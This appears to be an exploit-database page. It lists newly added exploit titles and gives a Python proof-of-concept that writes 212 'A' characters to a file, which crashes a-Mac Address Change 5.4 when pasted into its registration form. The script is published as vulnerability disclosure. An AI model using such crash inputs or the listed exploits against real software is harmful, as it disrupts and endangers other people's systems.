
13 changes to exploits/shellcodes Anyburn 4.3 - 'Convert image to file format' Denial of Service Advanced Host Monitor 11.90 Beta - 'Registration number' Denial of Service (PoC) AMAC Address Change 5.4 - Denial of Service (PoC) ASPRunner Professional 6.0.766 - Denial of Service (PoC) FlexHEX 2.46 - Denial of Service SEH Overwrite (PoC) LanHelper 1.74 - Denial of Service (PoC) macOS XNU - Copy-on-Write Behaviour Bypass via Partial-Page Truncation of File macOS < 10.14.3 / iOS < 12.1.3 - Arbitrary mach Port Name Deallocation in XPC Services due to Invalid mach Message Parsing in _xpc_serializer_unpack macOS < 10.14.3 / iOS < 12.1.3 - Sandbox Escapes due to Type Confusions and Memory Safety Issues in iohideventsystem macOS < 10.14.3 / iOS < 12.1.3 XNU - 'vm_map_copy' Optimization which Requires Atomicity isn't Atomic macOS < 10.14.3 / iOS < 12.1.3 - Kernel Heap Overflow in PF_KEY due to Lack of Bounds Checking when Retrieving Statistics 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass) 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH) (DEP Bypass) R 3.5.0 - Local Buffer Overflow (SEH) UltraISO 9.7.1.3519 - 'Output FileName' Local Buffer Overflow (SEH)
21 lines
No EOL
777 B
Python
Executable file
21 lines
No EOL
777 B
Python
Executable file
# Exploit Title: a-Mac Address Change v5.4 - Denial of Service (PoC)
|
|
# Discovery by: Rafael Pedrero
|
|
# Discovery Date: 2019-01-30
|
|
# Vendor Homepage: http://amac.paqtool.com/
|
|
# Software Link : http://amac.paqtool.com/
|
|
# Tested Version: 5.4
|
|
# Tested on: Windows XP SP3
|
|
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
|
|
|
|
# Steps to Produce the Crash:
|
|
# 1.- Run amac.exe
|
|
# 2.- copy content amac_Crash.txt or 212 "A" to clipboard (result from this python script)
|
|
# 3.- Go to Register - Amac Register Form and paste the result in all fields: "Your Name", "Your Company", "Register Code"
|
|
# 4.- Click in Register button and you will see a crash.
|
|
|
|
#!/usr/bin/env python
|
|
|
|
crash = "\x41" * 212
|
|
f = open ("amac_Crash.txt", "w")
|
|
f.write(crash)
|
|
f.close() |